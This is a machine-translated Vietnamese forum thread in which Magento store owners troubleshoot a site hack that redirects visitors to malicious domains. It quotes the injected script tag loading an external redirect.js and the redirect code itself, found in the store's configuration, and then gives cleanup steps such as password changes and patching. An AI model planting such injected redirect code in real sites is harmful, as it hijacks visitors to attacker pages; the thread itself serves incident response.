Trang web bắt đầu chuyển hướng đến một url khác


9

Maybe it's infected by some virus.

Trang web của tôi bắt đầu chuyển hướng đến các URL bị nhiễm bệnh này.

http://mon.setsu.xyz
và đôi khi https://tiphainemollard.us/index/?1371499155545
Liên kết bị nhiễm

những gì tôi đã làm để giải quyết.

  1. Đã nhận xét tệp .htaccess (không có gì xảy ra)
  2. Bình luận bao gồm thư mục (không có gì xảy ra)
  3. Máy chủ hoàn chỉnh được quét (không có gì xảy ra không tìm thấy phần mềm độc hại virus)
  4. Đã thay đổi đường dẫn CSS, phương tiện và js từ cơ sở dữ liệu để đảm bảo rằng thời tiết PHP hoặc bất kỳ js nào đang hoạt động (không có gì xảy ra)
  5. select * from core_config_data where path like '%secure%';tất cả các liên kết đều ok CẬP NHẬT

Tôi đã googled và nhiều bài báo đã được viết về điều này nhưng họ cho rằng đó là một vấn đề trình duyệt hoặc hệ thống của tôi bị nhiễm bệnh. Một bài viết về điều này ngay cả khi tôi mở trang web trên điện thoại hoặc trên máy tính xách tay cá nhân của tôi, các vấn đề đều giống nhau.

CẬP NHẬT 2

Tôi tìm thấy hàng trong cơ sở dữ liệu bị ảnh hưởng. (như Boris K. cũng nói)

Trong giá trị core_config_data bảng design/head/includescó một

<script src="<a href="https://melissatgmt.us/redirect_base/redirect.js">https://melissatgmt.us/redirect_base/redirect.js</a>" id="1371499155545"></script>  

Mà sẽ được chèn vào phần đầu trên tải trang.

Nếu bạn truy cập URL ở trên, bạn sẽ nhận được một tập lệnh chuyển hướng

   var redirChrome;
var isToChrome = document.currentScript.getAttribute('data-type');

if((isToChrome == 1 && navigator.userAgent.indexOf("Chrome") != -1) || !isToChrome){

 var idToRedirect = document.currentScript.getAttribute('id'); 

window.location.replace('https://tiphainemollard.us/index/?'+idToRedirect);
}

Trang web của khách hàng đang hoạt động từ chiều khi tôi gỡ bỏ đoạn script đó. But the main problem is how that script inserted into the database.

Một bản vá cũng đã lỗi thời nên tôi cũng cập nhật bản vá đó.

CẬP NHẬT 3 Trang web bị nhiễm lại. Đây là tập lệnh được chèn trong phần Quản trị viên (Quản trị viên-> Cấu hình-> Chung-> Thiết kế-> Đầu HTML-> Tập lệnh khác ) quản trị viên

Và trong cột cơ sở dữ liệu cơ sở dữ liệu

Tôi không biết phải làm gì bây giờ. Khi tôi thay đổi mọi mật khẩu, đã xóa tất cả người dùng cũ.

CẬP NHẬT 3

Cho đến bây giờ lỗi đó không đến vì vậy có nghĩa là bằng cách làm theo các bước trên, chúng tôi có thể khắc phục vấn đề này.

CẬP NHẬT :: 4 Luôn cài đặt các bản vá vì nó giúp tôi trong các dự án để làm cho cửa hàng ít bị các loại vấn đề này và các bản vá cũng quan trọng. Người ta có thể sử dụng https://magescan.com/ để kiểm tra các vấn đề trên trang web của họ.


trong hệ thống của bạn có thể bị ảnh hưởng xin vui lòng kiểm tra nó. kiểm tra trình duyệt của bạn
Rama Chandran M

@RamaChandran khi tôi google về url này, hầu hết mọi người đều cho rằng đó là sự cố trình duyệt. Tôi mở trang web trong điện thoại của tôi cũng có vấn đề tương tự.
inrsaurabh

Vui lòng cung cấp url trang web của bạn
Rama Chandran M

1
Tôi đã xóa <script src = "<a href = " hdississgmt.us/redirect_base/redirect.js " Nó vẫn không hoạt động. Và sau khi tôi truy cập trang web của mình, mã javascrip đó sẽ hiển thị lại. Bạn có suy nghĩ gì không? Địa chỉ trang web là hdvideodepot.com
Đánh dấu

1
Bạn có thể vui lòng thêm thẻ phiên bản magento?
sv3n

Câu trả lời:


6

Tôi tìm thấy mã được tiêm trong core_config_databảng, bên dưới design/head/includes. Đã xóa nó và bây giờ trang web đã trở lại bình thường.

CẬP NHẬT: Như mọi người khác đã đề cập, nó đã xảy ra một lần nữa vào sáng nay. Lần này tôi đã thoát khỏi nó dễ dàng hơn từ Bảng quản trị System > Configuration > General > Design > HTML Head > Miscellaneous Scripts. Đây là một lỗ hổng lớn, tôi hy vọng Magento đang làm việc trên một bản vá.

CẬP NHẬT 2: Kịch bản trở lại một lần nữa, vì vậy tôi đã thay đổi mật khẩu db, xóa bộ nhớ cache. Khoảng một giờ sau, kịch bản đã trở lại. Vì vậy, tôi không nghĩ rằng nó đã được thêm vào thông qua db. Tôi vừa thay đổi mật khẩu quản trị viên, hãy xem liệu nó có quay trở lại không.

CẬP NHẬT 3: Vì tôi đã thay đổi mật khẩu quản trị viên ngày hôm qua trên cả hai trang web bị ảnh hưởng của mình, khoảng 24 giờ sau cả hai vẫn sạch.


2
wow, đây là một vi phạm an ninh rất lớn, có ai biết loại lỗ hổng nào gây ra không?
Yehia A.Salam

3
Phải là một lỗ hổng trong các phiên bản cũ của Magento. Tôi có một trang web được xây dựng trên Magento 2.1 không bị ảnh hưởng, nhưng mọi trang web bên dưới phiên bản 2 đang được chuyển hướng.
Boris K.

Đây là một vấn đề bảo mật rất lớn. Có ai biết làm thế nào mã được tiêm vào bảng? Bảng đó là nơi, từ khu vực quản trị, chúng ta có thể thêm kiểu và javascript vào chân trang / tiêu đề của trang web. Làm thế nào một hacker có thể thỏa hiệp điều đó? Có nghĩa là họ đã truy cập vào quản trị viên?
Đậu phộng

nó tiếp tục quay lại sau khi xóa nó, không biết phải làm gì
Yehia A.Salam

Tôi đã phát hiện người dùng độc hại trên Hệ thống> Quyền> Người dùng. Sau khi xóa chúng (và trước đó đã sửa bảng core_config_data và thay đổi mật khẩu của quản trị viên), nó có vẻ ổn định, nhưng tôi muốn biết điều đó đã xảy ra như thế nào ở nơi đầu tiên. Lỗ hổng / cửa hậu có thể vẫn còn đó và đó là một bí ẩn.
Đậu phộng

3

Vấn đề tương tự trên một trang web magento khác. Tôi phát hiện ra rằng một tập lệnh được chèn vào phần CHÍNH của trang, yêu cầu redirect_base / redirect.js từ melissatgmt.us (sau đó đổi thành tên miền khác) nhưng không thể hiểu được cách này được đưa vào.

CẬP NHẬT : Như đã đề cập bởi những người khác, đã tìm thấy mục trong bảng core_config_data và xóa nó nhưng bản ghi đã được tải lại ở trang tiếp theo. Tôi đã thay đổi mật khẩu db và bây giờ nó dường như bị đánh bại. Tôi không chắc chắn việc thay đổi mật khẩu là giải pháp tối ưu nhưng dù sao cũng là một cải tiến về bảo mật.

CẬP NHẬT 2 : Như Jix Sas đã nêu, truy cập từ config trong quản trị magento là một giải pháp dễ dàng hơn so với truy cập trực tiếp vào bảng cơ sở dữ liệu. Nhưng cứt cứ quay lại cứ sau 10/15 phút.

CẬP NHẬT 3 : Đã thay đổi mật khẩu quản trị viên, đã kiểm tra và lưu một số trang cms (dịch vụ khách hàng và về chúng tôi) dường như bị nhiễm bằng cách nào đó, bộ nhớ cache bị vô hiệu hóa, bộ nhớ cache được làm sạch nhiều lần (sau mỗi lần kiểm tra & lưu trang cms bị nhiễm) kịch bản được thêm vào trong 8 giờ qua.


Vâng, bạn đúng, tôi đã nhận được hàng bị ảnh hưởng.
inrsaurabh

Lưu ý rằng quản trị viên magento có thể truy cập mà không gặp sự cố và trong nhật ký web tôi có thể thấy rằng các truy cập bot không bị ảnh hưởng. Tôi nghĩ phần mềm độc hại được giới hạn ở lối vào và kiểm tra tác nhân người dùng của trình duyệt.
ConsuLanza Informatica

vậy bạn có biết nó được tiêm từ đâu không?
Yehia A.Salam

vâng tôi có thể xác nhận rằng nó cứ quay lại sau mỗi 10/15 phút, ngay cả sau khi xóa mục nhập khỏi cơ sở dữ liệu
Yehia A.Salam

2

Tôi đã thay đổi đường dẫn đến bảng quản trị app/etc/local.xmlvà nó giúp. Kịch bản không còn được thêm vào design/head/includes.

Giải trình :

Trong phần app/etc/local.xmlTôi đã thay đổi <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>Trước đây sitedomain.com/admin, và bây giờ đường dẫn đến bảng quản trị sẽ là sitedomain.com/new_admin_path


Xin lỗi tôi đã không hiểu bạn những gì bạn đã làm, vui lòng giải thíchwhich path u chagned
inrsaurabh

Trong ứng dụng / etc / local.xml tôi đã thay đổi <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>Trước đây, nó là sitedomain.com/admin và bây giờ, đường dẫn đến bảng quản trị sẽ được sitedomain.com/new_admin_path
Eugenia

Ok tôi hiểu rồi, bạn gợi ý
inrsaurabh

1

Đây là một cứu trợ lớn như vậy, tôi đã khôi phục trang web của tôi 10 lần kể từ sáng.

Con bọ cứ lặp đi lặp lại.

Giải pháp tối thượng là gì?

Thay đổi mật khẩu DB? Thay đổi mật khẩu root? Bất kỳ bản vá nào được phát hành?

Tôi không chắc chắn nếu điều này có liên quan tôi đã nhận được email bên dưới từ Tư vấn bảo mật

Thưa ông hoặc bà

Chúng tôi là Hatimeria, một công ty phát triển Magento có trụ sở tại Thụy Sĩ, Ba Lan và Hà Lan.

Gần đây, chúng tôi bắt đầu làm việc với một khách hàng mới và tiếp quản máy chủ cũ của anh ấy. Tại thời điểm chúng tôi truy cập vào máy chủ, chúng tôi tình cờ phát hiện ra một số phần mềm độc hại, trong đó tin tặc có thể chiếm quyền điều khiển máy chủ của khách hàng và sử dụng nó như một máy hack tin tặc trên máy tính để hack các trang web khác. Tất nhiên, khách hàng không biết rằng điều này đã xảy ra trên máy chủ của mình.

Chúng tôi đã tìm thấy thông tin cơ sở dữ liệu của trang web của bạn đã bị hack thông qua máy chủ đó. Tất nhiên chúng tôi sẽ không làm bất cứ điều gì với nó, nhưng tôi cảm thấy bắt buộc phải liên lạc với bạn và cho bạn biết những gì đang xảy ra. Việc hack được thực hiện thông qua lỗ hổng Magento Cacheleak, hiện vẫn có thể có mặt trên cửa hàng của bạn.

Tôi khuyên bạn nên xử lý ngay lỗ hổng đó và thay đổi mật khẩu cơ sở dữ liệu của bạn. Kỹ thuật viên của chúng tôi nói rằng điều này sẽ mất khoảng 30 phút.

Trên trang web MageReport, bạn có thể thấy những gì trang web của bạn có thể dễ bị tổn thương: https://www.magereport.com/scan/?s=

Mục đích chính của tôi về email này không phải là để thu hút khách hàng, nhưng nếu bạn cần trợ giúp để bảo vệ cửa hàng của bạn, hoặc có bất kỳ câu hỏi nào khác, chúng tôi rất sẵn lòng giúp đỡ.

Trân trọng, Thomas Tanner

Vì tôi đoán Giải pháp là Thay đổi mật khẩu DB


1

Chúng ta cần hiểu nguyên nhân CHÍNH của việc tiêm spam như vậy là gì

Nếu trang web của bạn đã được tiêm, vui lòng kiểm tra trang web của bạn trên TẤT CẢ BA phần mềm quét phần mềm độc hại

https://magescan.com

https://www.magereport.com

https://sitecheck.sucuri.net/

Tôi có cảm giác điều này là do thiếu bản vá bảo mật! Nếu bạn thấy một bản vá bị thiếu, BÁO CÁO NÓ THEO CHỦ ĐỀ NÀY .

  1. Thay đổi mật khẩu truy cập Hosting Thay đổi mật khẩu cơ sở dữ liệu Thay đổi mật khẩu đăng nhập của quản trị viên Ẩn ADMIN VÀ TẢI XUỐNG các url và ẩn / RSS / từ chế độ xem công khai.

  2. Thực hiện quét virus toàn bộ trang web, nhà cung cấp dịch vụ lưu trữ của bạn có thể quét trang web nếu bạn không thể tự làm điều đó.

  3. Truy cập Sysytem -> Người dùng và xem liệu có bất kỳ người dùng nào đã đăng ký UNAUTHORIZED trên tài khoản không.


0

Tôi đã khắc phục vấn đề. Ngay cả sau khi tôi xóa tệp fhis <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script>khỏi core_config_databảng trong design/head/includesgiá trị. Nó không giải quyết được vấn đề. mã script được chèn đi viết lại. Để khắc phục vấn đề, chỉ cần làm theo ba bước sau.

  1. Xóa mã script khỏi core_config_databảng trong design/head/includes.
  2. Thay đổi mật khẩu cơ sở dữ liệu bao gồm app/etc/local.xmlthông tin xác thực.
  3. Xóa Cache trong thư mục gốc Magento bằng lệnh này rm -rf var/cache/*

ps tôi đã dành cả ngày. Hy vọng, điều này sẽ làm việc cho bạn. Và hãy chắc chắn sao lưu tập tin mọi lúc.


0

chính xác điều này đã xảy ra với tôi chỉ ngày hôm nay! chuyển hướng đến cùng một trang web. tuy nhiên, tôi tìm thấy tập lệnh trong bảng quản trị Magento theo cấu hình> thiết kế> đầu html> tập lệnh misc. Có kịch bản này: <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script> tôi đã gỡ bỏ nó khỏi đó và trang web đang hoạt động tốt. Tôi không có thư mục mà bạn nói bạn đã tìm thấy tập lệnh. Bạn có biết nó ở đâu không? (như bạn biết đường dẫn đến đầu HTML> tập lệnh misc)

Ngoài ra, gần đây bạn đã làm gì? có lẽ chúng ta có thể tìm ra nguyên nhân? Đối với tôi, tôi đã cài đặt một cửa sổ bật lên bản tin miễn phí có thể là nguyên nhân. Thế còn bạn?

CẬP NHẬT: bây giờ kịch bản đã trở lại. Ai đó cho tôi biết làm thế nào tôi có thể truy cập tập lệnh này từ cơ sở dữ liệu để loại bỏ nó?

CẬP NHẬT 2: như Mark đã nêu, việc xóa tập lệnh VÀ thay đổi mật khẩu cơ sở dữ liệu đã ngăn tập lệnh này quay trở lại. Nếu bất cứ ai biết tên của lỗ hổng này, hoặc nếu có nguy hiểm cho việc thanh toán của khách hàng, xin vui lòng cho chúng tôi biết.

Khi sử dụng trang web của chúng tôi, bạn xác nhận rằng bạn đã đọc và hiểu Chính sách cookieChính sách bảo mật của chúng tôi.
Licensed under cc by-sa 3.0 with attribution required.